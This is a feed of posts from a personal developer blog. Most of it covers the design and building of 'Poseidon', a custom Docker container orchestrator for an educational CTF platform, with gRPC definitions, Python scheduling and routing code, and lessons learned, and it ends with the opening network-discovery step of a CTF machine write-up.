<li><p>N workers = N Traefik instances = N × routing capacity</p>
</li>
<li><p>Add worker = more compute AND more routing capacity</p>
</li>
</ul>
<p><strong>Example:</strong> If each Traefik can handle 1000 req/sec:</p>
<ul>
<li><p>1 centralized Traefik = 1000 req/sec max</p>
</li>
<li><p>5 workers with Traefik = 5000 req/sec max (behind NLB)</p>
</li>
</ul>
<p>This scales routing capacity horizontally, not just compute capacity.</p>
<h2 id="heading-lessons-learned">Lessons Learned</h2>
<h3 id="heading-1-controldata-plane-separation-is-real">1. Control/Data Plane Separation is Real</h3>
<p>This isn't just theory from distributed systems textbooks. The moment you separate "who decides" from "who executes," resilience improves dramatically.</p>
<h3 id="heading-2-service-mesh-reduces-coupling">2. Service Mesh Reduces Coupling</h3>
<p>Master doesn't know about Traefik. Workers don't know about routing logic. Consul is the only shared dependency. This means:</p>
<ul>
<li><p>We could swap Traefik for Nginx without touching the Master</p>
</li>
<li><p>We could change scheduling logic without touching Traefik</p>
</li>
<li><p>Each component has a single, clear responsibility</p>
</li>
</ul>
<h3 id="heading-3-tool-documentation-matters-more-than-you-think">3. Tool Documentation Matters More Than You Think</h3>
<p>The Traefik tag issue cost hours because I assumed defaults would work. Reading the Consul provider docs thoroughly upfront would have saved time.</p>
<h3 id="heading-4-test-failure-modes-early">4. Test Failure Modes Early</h3>
<p>Spinning up multiple workers locally and killing processes randomly validated the architecture way before AWS deployment. If it doesn't work with 2 local workers, it won't work with 10 EC2 instances.</p>
<p>The system works. Now we need to make it production-ready.</p>
<hr />
<p><em>Follow along as I continue building Poseidon. The code will be open sourced one we’re deployed and test on AWS infrastructure.</em></p>
<p><strong>Previous Posts:</strong> <a target="_blank" href="https://hashnode.com/post/cmh8p84e9001902jr0l2id7iu">Part 1</a> | <a target="_blank" href="https://hashnode.com/post/cmhipb89k000802jl1yz0bhf5">Part 2</a></p>
]]></content:encoded></item><item><title><![CDATA[Building Poseidon #2: The Master-Worker Dance]]></title><description><![CDATA[In Part 1 of Building Poseidon, we established why we’re building Poseidon instead of using existing solutions like Kubernetes or AWS Fargate. We need instance-specific routing, fine-grained lifecycle control, and cost-effective operation within the ...]]></description><link>https://blog.realrudrap.dev/building-poseidon-2-the-master-worker-dance</link><guid isPermaLink="true">https://blog.realrudrap.dev/building-poseidon-2-the-master-worker-dance</guid><category><![CDATA[Docker]]></category><category><![CDATA[Cloud Computing]]></category><category><![CDATA[CTF]]></category><category><![CDATA[gRPC]]></category><category><![CDATA[System Design]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 03 Nov 2025 05:30:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1761898397042/2b3746d5-0db8-4cac-aa6d-6c276e12fae7.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://stackunwind.hashnode.dev/building-poseidon-1-why-were-not-using-kubernetes">Part 1 of Building Poseidon</a>, we established why we’re building Poseidon instead of using existing solutions like Kubernetes or AWS Fargate. We need instance-specific routing, fine-grained lifecycle control, and cost-effective operation within the AWS free tier.</p>
<p>Now comes the challenging part: Actually building it.</p>
<blockquote>
<p>Talk is cheap, show me the code - Linus Torvalds</p>
</blockquote>
<p>This post dives into the master-worker communication protocol, the orchestration logic that schedules containers across workers, and the real-world problems we hit along the way. Everything described here is running on my local machine right now, AWS deployment comes later.</p>
<h2 id="heading-the-architecture-a-quick-recap">The Architecture: A Quick Recap</h2>
<p>Poseidon follows a two-process model:</p>
<ul>
<li><p><strong>Master Process:</strong> Exposes a REST API to OrcaCTF’s backend, maintains global state in Redis, orchestrates container lifecycles across workers.</p>
</li>
<li><p><strong>Worker Process:</strong> Run on compute nodes, interface with Docker daemon, spin up containers and report status back to the master.</p>
</li>
</ul>
<p>The Master in itself doesn’t know ( or care ) about what kind of images it’s running. It’s a dumb executor that receives requests like:</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"user_id"</span>: <span class="hljs-string">"litmus"</span>,
  <span class="hljs-attr">"challenge_id"</span>: <span class="hljs-string">"localhost:5000/orca-challenges/our-first-challenge:latest"</span>,
  <span class="hljs-attr">"mem_limit"</span>: <span class="hljs-number">256</span>,
  <span class="hljs-attr">"nano_cpus"</span>: <span class="hljs-number">5000000</span>,
  <span class="hljs-attr">"protocol"</span>: <span class="hljs-string">"http"</span>
}
</code></pre>
<p>It returns a unique hostname when the users requested container is accessible.</p>
<h3 id="heading-the-communication-protocol-rest-for-clients-grpc-for-workers">The Communication Protocol: REST for Clients, gRPC for Workers</h3>
<p>Early on, I had to decide: how should the master and worker talk to each other?</p>
<h4 id="heading-the-decision-hybrid-approach">The Decision: Hybrid Approach:</h4>
<p><strong>Master &lt;→ Frontend/Backend:</strong> REST API</p>
<ul>
<li><p>OrcaCTF’s backend makes simple HTTP requests to start/stop containers</p>
</li>
<li><p>Easy to debug with cURL, integrates with existing FastAPI infrastructure</p>
</li>
<li><p>No need for client ( OrcaCTF backend ) side gRPC dependencies</p>
</li>
</ul>
<p><strong>Master ←&gt; Workers:</strong> gRPC</p>
<ul>
<li><p>Workers are internal infrastructure, not exposed to users</p>
</li>
<li><p>Need high performance, low latency communication for container operations</p>
</li>
<li><p>Strong typing via Protocol Buffers. Catches integration bugs early</p>
</li>
<li><p>Bi-directional streaming support which can be used for real-time logs and metrics</p>
</li>
</ul>
<p>This isn’t an either-or decision. REST is great for public APIs whilst gRPC is better for internal service-to-service communication where performance and type-safety matters.</p>
<h3 id="heading-the-grpc-protocol-definition">The gRPC Protocol Definition</h3>
<p>Here’s our <code>.proto</code> defining the worker service:</p>
<pre><code class="lang-json">syntax = <span class="hljs-string">"proto3"</span>;
package poseidon.worker;

service WorkerService {
    rpc SpawnContainer(SpawnRequest) returns (SpawnResponse);
    rpc TerminateContainer(TerminateRequest) returns (TerminateResponse);
    rpc GetWorkerStatus(WorkerStatusRequest) returns (WorkerStatusResponse);
}

message SpawnRequest {
    string request_id = 1;
    string image_name = 2;
    int32 start_timeout_seconds = 3;
    int32 mem_limit = 4;
    int32 nano_cpus = 5;
}

message SpawnResponse {
    string container_id = 1;
    string internal_ip = 2;
    int32 internal_port = 3;
    bool success = 4;
    string error_message = 5;
}

message TerminateRequest {
    string container_id = 1;
}

message TerminateResponse {
    bool success = 1;
    string error_message = 2;
}

message WorkerStatusRequest {}

message WorkerStatusResponse {
    string node_id = 1;
    float cpu_usage_percent = 2;
    float memory_percent = 3;
    int32 container_count = 4;
}
</code></pre>
<h3 id="heading-key-design-decisions">Key design decisions:</h3>
<ul>
<li><p><code>SpawnResponse</code> returns the internal IP and port. The master needs to know where to route traffic. Containers run on a shared Docker network, so we use internal IPs, not published ports.</p>
</li>
<li><p><code>success</code>+<code>error_message</code> patterns. Workers can fail for many reasons ( image pull failure, resource exhaustion, Docker daemon issues ). Explicit success flags make error handling cleaner than relying on gRPC status codes alone.</p>
</li>
<li><p><code>GetWorkerStatus</code> for load balancing: Workers periodically report CPU, memory and container count. The master uses this for intelligent scheduling.</p>
</li>
</ul>
<h2 id="heading-worker-discovery-why-consul">Worker Discovery: Why Consul?</h2>
<p>One of the first problems, how does the master know which workers exist and whether they’re healthy?</p>
<p>We could maintain a worker registry in Redis, but that introduces a new failure mode: what if a worker crashes without deregistering itself? The master would keep sending requests to a dead worker.</p>
<p><strong>Enter Consul</strong></p>
<p><a target="_blank" href="https://developer.hashicorp.com/consul">Consul</a> is a service mesh solution that handles service discovery and health-checking. Workers register themselves with Consul on startup, and Consul continuously health-checks them via gRPC’s health protocol.</p>
<h4 id="heading-why-consul-over-manual-health-checks">Why Consul over Manual Health Checks?</h4>
<p><strong>Separation of Concerns:</strong> The master doesn’t have to implement heartbeat logic. Consul does that out of the box.</p>
<p><strong>Graceful draining:</strong> When we deploy to AWS, the worker instances will be behind a Load Balancer, which may decide to de-provision a worker if the load isn’t high. Workers can then set a “draining” status in their health check responses, so Consul can inform the master to not schedule any new instances on the node while the existing containers complete their tenure and request for extensions are denied.</p>
<p><strong>Proven reliability:</strong> Consul is battle-tested infrastructure. We’re not re-inventing service discovery.</p>
<p>The Master queries Consul for healthy workers and gets back a list of <code>(node_id, address)</code> pairs. Simple.</p>
<h2 id="heading-the-orchestration-flow-from-request-to-running-container">The Orchestration Flow: From Request to Running Container</h2>
<p>Let’s walk through what happens when a user clicks “Start Challenge”</p>
<h4 id="heading-phase-1-worker-selection-scheduling">Phase 1: Worker Selection ( Scheduling )</h4>
<p>The Orchestrator asks the Scheduler for the best available Worker:</p>
<pre><code class="lang-python">selected_worker = <span class="hljs-keyword">await</span> self.scheduler.get_best_worker()
<span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> selected_worker:
    <span class="hljs-keyword">raise</span> RuntimeError(<span class="hljs-string">"No available workers to handle request"</span>)
</code></pre>
<p>The scheduler implements a weighted score system:</p>
<pre><code class="lang-python">cpu_weight = <span class="hljs-number">0.5</span>
mem_weight = <span class="hljs-number">0.3</span>
container_weight = <span class="hljs-number">0.2</span>

score = (cpu * cpu_weight) + (mem * mem_weight) + (container_count * container_weight)
</code></pre>
<p>Workers with lower scores ( less loaded ) are preferred. This is a simple heuristic, not a sophisticated bin-packing algorithm, but it works at our expected scale.</p>
<p>The Scheduler polls all workers every 15 seconds via <code>GetWorkerStatus</code>, caching their metrics in Redis. When a container request arrives, it picks the worker with the lowest score from the cached data.</p>
<p><strong>Trade-off:</strong> There’s a 15 second window where Worker stats might be stale. A worker could become overloaded between polls, and the scheduler wouldn’t know. For our use case (15-20 concurrent users) this should do the trick. When we scale and need real-time accuracy, we could poll more frequently, or use event-driven updates.</p>
<h4 id="heading-phase-2-container-spawn">Phase 2: Container Spawn</h4>
<p>Once a worker is selected, the Orchestrator sends a gRPC <code>SpawnContainer</code> request:</p>
<pre><code class="lang-python">running_container = <span class="hljs-keyword">await</span> self.worker_client.spawn_container(
    selected_worker,
    challenge_id,
    instance_id,
    mem_limit,
    nano_cpus
)
</code></pre>
<p>On the Worker side, this triggers <code>DockerManager</code>:</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">run_container</span>(<span class="hljs-params">self, image_name: str, instance_id: str, 
                  mem_limit: int | None, nano_cpus: int | None</span>) -&gt; Container:</span>
    memory_limit_str = <span class="hljs-string">f"<span class="hljs-subst">{mem_limit}</span>m"</span> <span class="hljs-keyword">if</span> mem_limit <span class="hljs-keyword">else</span> <span class="hljs-string">"256m"</span>

    <span class="hljs-keyword">try</span>:
        container = self.client.containers.run(
            image=image_name,
            detach=<span class="hljs-literal">True</span>,
            auto_remove=<span class="hljs-literal">True</span>,
            labels={<span class="hljs-string">"poseidon.instance_id"</span>: instance_id},
            network=self.network_name,
            mem_limit=memory_limit_str,
            nano_cpus=nano_cpus
        )
        <span class="hljs-keyword">return</span> container
    <span class="hljs-keyword">except</span> ImageNotFound:
        logger.warning(<span class="hljs-string">f"Image '<span class="hljs-subst">{image_name}</span>' not found locally. Pulling..."</span>)
        self.client.images.pull(image_name)
        <span class="hljs-keyword">return</span> self.run_container(image_name, instance_id, mem_limit, nano_cpus)
</code></pre>
<p><strong>Key Details:</strong></p>
<ul>
<li><p><code>auto_remove: True</code>: Containers are ephemeral; When they stop, Docker automatically cleans them up</p>
</li>
<li><p><code>labels={"poseidon.instance_id": instance_id}</code> : Labels enable visibility. Having descriptive labels like this helps in pinpointing the sources of any issues. Traefik ( our reverse-proxy ) can also be configured to route traffic depending on these labels</p>
</li>
<li><p><strong>Automatic image pulling:</strong> If the challenge image isn’t cached locally, the worker pulls it. This adds latency on the first request, but simplifies deployment.</p>
</li>
</ul>
<h3 id="heading-phase-3-network-discovery">Phase 3: Network Discovery</h3>
<p>After the container starts, the worker needs to determine it’s internal IP and report it along with the port it is serving the container on. This is trickier than it sounds.</p>
<p>Containers run on a shared Docker network. We don’t use published ports because that would require dynamic port allocation and port conflict handling. Instead, containers expose their services on an internal port ( like 8080 for HTTP challenges ), and Traefik routes traffic based on the hostname.</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_container_details</span>(<span class="hljs-params">self, container_id: str</span>) -&gt; dict | <span class="hljs-keyword">None</span>:</span>
    container = self.client.containers.get(container_id)
    container.reload()

    <span class="hljs-comment"># Get IP from the shared network</span>
    network_settings = container.attrs[<span class="hljs-string">'NetworkSettings'</span>][<span class="hljs-string">'Networks'</span>][self.network_name]
    ip_address = network_settings[<span class="hljs-string">'IPAddress'</span>]

    <span class="hljs-comment"># Get the internal port from the image's EXPOSE directive</span>
    exposed_ports = container.attrs[<span class="hljs-string">'Config'</span>][<span class="hljs-string">'ExposedPorts'</span>]
    internal_port_str = list(exposed_ports.keys())[<span class="hljs-number">0</span>]  <span class="hljs-comment"># e.g., "80/tcp"</span>
    internal_port = int(internal_port_str.split(<span class="hljs-string">'/'</span>)[<span class="hljs-number">0</span>])

    <span class="hljs-keyword">return</span> {
        <span class="hljs-string">"id"</span>: container.id,
        <span class="hljs-string">"ip_address"</span>: ip_address,
        <span class="hljs-string">"internal_port"</span>: internal_port,
    }
</code></pre>
<p>This relies on challenge images correctly declaring their exposed ports via <code>EXPOSE</code> in the Dockerfile. If the challenge doesn’t expose a port, this logic fails. This is intentional as it helps catch misconfigurations early.</p>
<h3 id="heading-phase-4-state-management-and-routing">Phase 4: State Management and Routing</h3>
<p>Once the container is running, the Orchestrator:</p>
<ul>
<li><p><strong>Generates a unique hostname:</strong> <code>sha256(instance_id)[:12].&lt;ctf_platform_domain&gt;</code></p>
</li>
<li><p><strong>Saves the instance metadata to Redis</strong></p>
<pre><code class="lang-python">  instance = Instance(
         instance_id=instance_id,
         user_id=user_id,
         challenge_id=challenge_id,
         worker=selected_worker,
         hostname=<span class="hljs-string">f"<span class="hljs-subst">{external_hostname}</span>.local"</span>,
         container_id=running_container.container_id,
         internal_ip=running_container.internal_ip,
         internal_port=running_container.internal_port,
         created_at=now_ts,
         expires_at=now_ts + cfg.default_ttl_seconds
     )
     <span class="hljs-keyword">await</span> self.state_manager.save_instance(instance)
</code></pre>
</li>
<li><p><strong>Creates a routing rule in Traefik</strong></p>
<pre><code class="lang-python">      route_definition = RouteDefinition(
             instance_id=instance.instance_id,
             protocol=protocol,
             hostname=instance.hostname,
             backend_ip=running_container.internal_ip,
             backend_port=running_container.internal_port,
         )
         self.proxy_manager.create_route(route_definition)
</code></pre>
</li>
</ul>
<p>Traefik now knows: “traffic to <code>a3f4b92c8d.local</code> should go to <code>172.18.0.5:80</code>.</p>
<p>The user receives their unique URL, and can connect immediately.</p>
<h3 id="heading-what-broke-and-how-we-fixed-it">What broke ( and how we fixed it )</h3>
<h4 id="heading-problem-1-silent-deployment-failures">Problem 1: Silent Deployment Failures</h4>
<p>Early on, containers were failing to start, but the Orchestrator was reporting success. The issue? We weren’t checking the gRPC response properly</p>
<pre><code class="lang-python"><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> running_container.success:
    <span class="hljs-keyword">raise</span> RuntimeError(<span class="hljs-string">f"Failed to spawn container: <span class="hljs-subst">{running_container.error_message}</span>"</span>)
</code></pre>
<p>Now, if the worker reports <code>success=False</code>, the Orchestrator propagates the error up to the User. Simple, but easy to miss.</p>
<h4 id="heading-problem-2-docker-networking-hell">Problem 2: Docker Networking Hell</h4>
<p>Getting Traefik to reliably discover containers on the shared Docker network took far longer than expected. Containers were starting, but Traefik couldn’t route to them.</p>
<p>The issue was that Traefik was looking on the wrong network. We had to explicitly configure</p>
<pre><code class="lang-python">network=self.network_name  <span class="hljs-comment"># Must match Traefik's configured network</span>
<span class="hljs-comment"># An environment variable stored the value of self.network_name and initialized when the Orchestrator spawned</span>
</code></pre>
<p>And ensure that Traefik was itself running on the same Docker network. Obvious in hindsight, nothing short of painful in practice.</p>
<h4 id="heading-problem-3-cpu-limits-dont-work-in-docker-in-docker">Problem 3: CPU Limits don’t work in Docker-in-Docker</h4>
<p>We’re running workers as Docker containers themselves ( for local testing ), but Docker-in-Docker doesn’t support <code>nano_cpus</code> limits properly. The inner containers inherit the outer containers limits, not their own.</p>
<p>For now, we’ve accepted this limitation. On AWS EC2 instances ( where Docker runs natively ), CPU limits will work as intended. But it’s a reminder that abstractions leak, and testing in production-like environments matter.</p>
<h3 id="heading-whats-next">What’s next</h3>
<p>This post covered the orchestration core: worker discovery, container spawning, and state management. But we're not done. We will explore the containment and resilience: isolation, resource control and ensuring the system can shut down gracefully without abandoning active users.</p>
<hr />
<p><em>Follow along as we continue building Poseidon. The code will be open-sourced soon after we test a deployed PoC.</em></p>
]]></content:encoded></item><item><title><![CDATA[Building Poseidon #1: Why we're not using Kubernetes]]></title><description><![CDATA[💡
TL;DR: Built Poseidon, a custom container orchestrator for CTF challenges. Evaluated Lambda (runtime limits), Fargate (no per-container routing), and Kubernetes (complexity overkill). Went with a master-worker architecture using Docker SDK, Redis,...]]></description><link>https://blog.realrudrap.dev/building-poseidon-1-why-were-not-using-kubernetes</link><guid isPermaLink="true">https://blog.realrudrap.dev/building-poseidon-1-why-were-not-using-kubernetes</guid><category><![CDATA[Docker]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 27 Oct 2025 05:30:08 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1761534248036/031e20d9-3794-426f-8991-3ed7fa58bac8.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text"><strong>TL;DR:</strong> Built Poseidon, a custom container orchestrator for CTF challenges. Evaluated Lambda (runtime limits), Fargate (no per-container routing), and Kubernetes (complexity overkill). Went with a master-worker architecture using Docker SDK, Redis, and subdomain-based routing. Targets 15-20 concurrent users on AWS free tier. Open-sourcing soon.</div>
</div>

<h2 id="heading-the-problem-ctf-challenges-need-dynamic-infrastructure">The Problem: CTF Challenges Need Dynamic Infrastructure</h2>
<p>Capture The Flag (CTF) competitions have evolved significantly. Modern challenges often require isolated, interactive environments where participants can exploit vulnerabilities, reverse engineer binaries, or manipulate web applications in real time. These aren’t static challenges; they are live systems that need to be spun up on demand, accessible over the internet and then torn down after use.</p>
<p>For my Cloud Computing course project, my team is building <a target="_blank" href="http://orcactf.app"><strong>OrcaCTF</strong></a>. The vision was simple, students click a “Start Challenge” button, and within seconds they get a dedicated Docker container with a unique URL to connect to. The challenge runs for a set duration ( with extensions possible based on server load ), and then automatically cleans itself up.</p>
<p>Targeting 15-20 concurrent users initially, and an architecture that could scale far beyond that, we needed fine-grained control over container life-cycle, resource limits and networking. And we needed to do all of it on AWS free tier.</p>
<p>The question became, <strong>what’s the best way to orchestrate ephemeral Docker containers in the cloud?</strong></p>
<h2 id="heading-evaluating-the-serverless-landscape">Evaluating the Serverless Landscape</h2>
<p>My first instinct was to leverage serverless services. After all, for a Cloud Computing course, surely AWS or Azure would have pre-built solutions for this exact use case, right?</p>
<h3 id="heading-aws-lambda-api-gateway">AWS Lambda + API Gateway</h3>
<p><strong>The Promise:</strong> Serverless functions ( with Docker container support ) which scale to zero, pay only for what you use and handle thousands of concurrent requests</p>
<p><strong>The Reality:</strong> Lambda has a maximum runtime of 15 minutes. CTF challenges may take from 30 minutes to several hours. Participants also usually need to step away and return to their environment. Lambda’s ephemeral nature and strict time limits made it a non-starter.</p>
<h3 id="heading-aws-fargate">AWS Fargate</h3>
<p><strong>The Promise:</strong> Serverless containers, just specify your Docker image, and the Cloud handles the rest.</p>
<p><strong>The Reality:</strong> These services, while really convenient, are designed for microservices architecture where instances are interchangeable and load balanced. They are meant for <strong>instance-agnostic</strong> workloads.</p>
<p>We needed the opposite: <strong>Instance-specific routing.</strong> Each user needs their own container accessible via a unique subdomain like <code>a3f4b92c8d…orcactf.app</code>. Fargate abstracts away containers behind load balancers. Getting traffic to a <em>specific</em> container would require complex workarounds, and the solution would be tightly coupled to AWS-specific networking constructs.</p>
<h3 id="heading-aws-app-runner">AWS App Runner</h3>
<p>Similar story, great for deploying web services, but not so much for orchestrating user-specific ephemeral environments with custom networking requirements.</p>
<h2 id="heading-why-not-kubernetes-or-docker-swarm">Why not Kubernetes or Docker Swarm?</h2>
<p>The elephant in the room: Why not use battle tested orchestration platforms?</p>
<p><strong>Kubernetes</strong> is incredibly powerful, but it’s also incredibly complex. Setting up a cluster, managing nodes, configuring ingress controllers, wrangling pods vs deployments vs services; it’s a steep learning curve. For a project that has to go from zero to prototype in a month, K8s felt like bringing a cargo ship to a river rafting trip.</p>
<p>Moreover, Kubernetes is general-purpose by design. It is meant to manage long-lived services, rolling deployments and complex distributed systems. Our use case is much simpler: spin up a container, keep it alive for a few hours at maximum, and then clean it up. We don’t need auto-healing deployments or blue-green rollouts. We need <strong>ephemeral, user-scoped container lifecycle management.</strong></p>
<p>For our timeline and expertise level, Kubernetes might be an overkill for the current projected scale of the project.</p>
<p><strong>Docker Swarm</strong> has a gentler learning curve, but it’s still designed for orchestrating services across clusters, not managing per-user container instances with custom routing.</p>
<p>Both options also add operational overhead: cluster management, control plane High Availability (HA), storage orchestration, network policies. I’d be spending more time fighting the orchestrator than actually building the platform.</p>
<h2 id="heading-the-case-for-building-custom-enter-poseidon">The Case for Building Custom: Enter Poseidon</h2>
<p>After evaluating the existing landscape, I was reaffirmed of my assumption that our use case is very niche, and the existing tools are not optimized for it. They’re designed for microservices ( many identical deployments behind a load balancer ) or long-lived services ( always running, scaled horizontally ). CTF challenges are neither.</p>
<p>So I decided to build <strong><em>Poseidon</em></strong>. Keeping with the marine theme of OrcaCTF, Poseidon is our ‘orchestrator of the deep’, a purpose-built engine which is designed to be simple and performant.</p>
<h3 id="heading-core-requirements">Core Requirements:</h3>
<ol>
<li><p><strong>Absolute Control Over Container Lifecycle</strong></p>
<ul>
<li><p>Spin up containers on-demand</p>
</li>
<li><p>Enforce resource limits (CPU, memory, disk)</p>
</li>
<li><p>Support custom timeouts with user-requested extensions</p>
</li>
<li><p>Clean shutdown and cleanup</p>
</li>
</ul>
</li>
<li><p><strong>Instance-Specific Routing</strong></p>
<ul>
<li><p>Each container gets a unique subdomain: <code>&lt;SHA256(instance_id)&gt;.orcactf.app</code></p>
</li>
<li><p>Traffic must route to the <em>specific</em> container, not a pool</p>
</li>
<li><p>SSL/TLS termination for all subdomains</p>
</li>
<li><p>Support for SSH, HTTP connections</p>
</li>
</ul>
</li>
<li><p><strong>Cloud-Agnostic Architecture</strong></p>
<ul>
<li><p>Should work on AWS, Azure, GCP, or bare metal</p>
</li>
<li><p>No vendor lock-in via proprietary services</p>
</li>
<li><p>Portable enough to open-source and let others deploy</p>
</li>
</ul>
</li>
<li><p><strong>Observable &amp; Debuggable</strong></p>
<ul>
<li><p>Comprehensive logging and tracing</p>
</li>
<li><p>Real-time metrics (Prometheus + Grafana)</p>
</li>
<li><p>Easy visibility into what's happening under the hood</p>
</li>
</ul>
</li>
<li><p><strong>Cost-Effective</strong></p>
<ul>
<li><p>Run on EC2 instances within AWS free tier</p>
</li>
<li><p>Efficient resource utilization</p>
</li>
<li><p>No per-container pricing overheads</p>
</li>
</ul>
</li>
</ol>
<p>Quick note: I'm building this in parallel with writing about it. Some details will evolve as we discover what works.</p>
<h3 id="heading-architecture-philosophy-simplicity-over-features">Architecture Philosophy: Simplicity over features</h3>
<p>Poseidon follows a <strong>two-process</strong> model:</p>
<ul>
<li><p><strong>Master process:</strong> Runs alongside OrcaCTF’s other backend services. Handles API requests, maintains state in Redis, schedules containers across workers and monitors health.</p>
</li>
<li><p><strong>Worker process:</strong> Runs on one or more EC2 instances. Receives commands from the master, spins up Docker containers, adds helpful labels to help in routing and reports status back.</p>
</li>
</ul>
<p>The design is intentionally minimal. We’re not trying to compete with Kubernetes. We’re solving a specific problem with the simplest architecture that works.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1761533191284/1b3f8880-8118-43ae-acf9-879b87914208.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-the-user-experience">The User Experience:</h3>
<p>Let’s walk through the expected UX when a student wants to run a challenge:</p>
<ul>
<li><strong>Phase 1: Request ( User → Backend )</strong></li>
</ul>
<ol>
<li><p><strong>User clicks "Start Challenge"</strong> on the OrcaCTF frontend</p>
</li>
<li><p><strong>Frontend calls backend API</strong>, which validates the user's token and permissions</p>
</li>
<li><p><strong>Backend returns "pending"</strong>, triggering a loading spinner</p>
</li>
</ol>
<ul>
<li><strong>Phase 2: Orchestration ( Backend→Poseidon)</strong></li>
</ul>
<ol>
<li><p><strong>Backend calls Poseidon Master</strong>, passing challenge details and user ID</p>
</li>
<li><p><strong>Master verifies</strong> the user doesn't have an active instance running</p>
</li>
<li><p><strong>Master selects a worker</strong> (load balancing strategy TBD) and sends a work request</p>
</li>
<li><p><strong>Worker spins up the Docker container</strong>, setting labels for routing</p>
</li>
<li><p><strong>Worker performs health check</strong>, then reports success to Master</p>
</li>
<li><p><strong>Master updates Redis state</strong> with the container's unique subdomain</p>
</li>
</ol>
<ul>
<li><strong>Phase 3: Connection and cleanup ( User → Container )</strong></li>
</ul>
<ol>
<li><p><strong>Frontend polls backend</strong> until status changes to "ready"</p>
</li>
<li><p><strong>User receives their unique URL</strong>: <a target="_blank" href="https://a3f4b92c8d...orcactf.app"><code>a3f4b92c8d...orcactf.app</code></a></p>
</li>
<li><p><strong>Traffic</strong> is routed to the specific container based on subdomain</p>
</li>
<li><p><strong>After timeout expires</strong> (or user terminates early), container is cleaned up</p>
</li>
</ol>
<p>All of this happens quickly, with zero manual intervention.</p>
<h3 id="heading-why-open-source">Why Open-Source?</h3>
<p>Poseidon isn’t just a course project, it’s designed to be a reusable module. We will be open-sourcing it because every university, club, or small company that wants to host an interactive lab shouldn’t have to reinvent the wheel.</p>
<h2 id="heading-what-about-existing-platforms-like-ctfd">What about existing platforms like CTFd?</h2>
<p>If you’ve been in the CTF space, you’re likely thinking of platforms like CTFd and its <code>ctfd-whale</code> plugin. These are fantastic, all-in-one solutions for running a complete competition</p>
<p>However, the dynamic container components are often just that: plugins, tightly coupled to the main platform. They solve the problem for <em>CTFd</em></p>
<p>My goal for this project is different; I wanted to build a <strong>decoupled, general-purpose orchestration engine (Poseidon)</strong> that could be used with <em>any</em> platform, whether it’s our OrcaCTF, a custom-built site, or even non-CTF uses like educational sandboxes or on-demand coding labs.</p>
<p>Poseidon is designed to be the engine, not the entire car. This <strong>separation of concerns</strong> is a core part of our design philosophy.</p>
<hr />
<p>Follow along as I dive into:</p>
<ul>
<li><p>The master process architecture and API design.</p>
</li>
<li><p>Dynamic subdomain routing.</p>
</li>
<li><p>Worker process and Docker SDK integration</p>
</li>
<li><p>Observability with Prometheus and Grafana</p>
</li>
<li><p>Deployment, auto-scaling and lessons learned</p>
</li>
<li><p>Security details like container isolation strategies</p>
</li>
</ul>
<p>By the end, we’ll have a fully functional orchestration engine, a CTF platform and a deep understanding of how distributed systems work under the hood.</p>
<p>The ocean is deep. Let’s see how deep Poseidon can go.</p>
<hr />
<p><em>This is Part-1 of the “<strong><strong>Building Poseidon</strong></strong>” series. Follow along as we build a custom container orchestration engine from scratch.</em></p>
<h2 id="heading-a-note-on-terminology">A Note on Terminology</h2>
<p>Throughout this series, I use "I" when discussing Poseidon's architecture and implementation because I'm building this orchestration engine independently as my contribution to our team's larger OrcaCTF platform.</p>
<p>My teammates are handling other critical pieces: <a target="_blank" href="https://www.linkedin.com/in/piyush-sahu-a696731bb/">Piyush</a> is designing the CTF challenges themselves, while <a target="_blank" href="https://www.linkedin.com/in/lakshya-samay-singh-18320b286/">Lakshya</a> and <a target="_blank" href="https://www.linkedin.com/in/samanyu-raina-b31866318/">Samanyu</a> are building the frontend and integrating scoring systems. Poseidon is the infrastructure layer that makes those challenges accessible in isolated, on-demand environments.</p>
<p>This series documents my specific journey building that infrastructure: the decisions I made, the problems I hit, and the solutions I found.</p>
]]></content:encoded></item><item><title><![CDATA[Terrier CTF [Part 1]: Network Reconnaissance to SSTI: The Methodology Beneath the Exploit]]></title><description><![CDATA[Step 0: Network Address Discovery
The Terrier CTF Boot2Root machine presented an interesting challenge from the start: identifying the machine’s IP address on the local network. While this might seem quite straightforward in theory, the practical rea...]]></description><link>https://blog.realrudrap.dev/terrier-ctf-part-1-methodology-beneath-exploit</link><guid isPermaLink="true">https://blog.realrudrap.dev/terrier-ctf-part-1-methodology-beneath-exploit</guid><category><![CDATA[CTF Writeup]]></category><category><![CDATA[CTF]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 20 Oct 2025 05:30:40 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760333413720/a5955db5-f349-4ffb-b1c1-25a052b8c4c4.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-step-0-network-address-discovery">Step 0: Network Address Discovery</h2>
<p>The Terrier CTF Boot2Root machine presented an interesting challenge from the start: identifying the machine’s IP address on the local network. While this might seem quite straightforward in theory, the practical reality of VM networking configurations often introduces unexpected complexity which is worth documenting.</p>
<p>Usually, most Boot2Root VMs do us a favor and print their IP address to the console when they boot. Without this convinience, we need a more systematic approach to network discovery. I will be demonstrating the approach I used when using VMWare Workstation Pro on my Ubuntu machine.</p>
<p>First, ensure that the networking mode is set to NAT. This ensures that the machines are on the same virtual network segment and can access each other. Following this, in the Advanced settings menu of the dialog box, record the MAC address.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1758773359618/d4fde2bc-21c9-4a35-ad71-7447bdab9d7e.png" alt class="image--center mx-auto" /></p>
<p>Then using the <code>arp -a</code> command on the shell, we get the list of various IP addresses associated with the physical addresses</p>
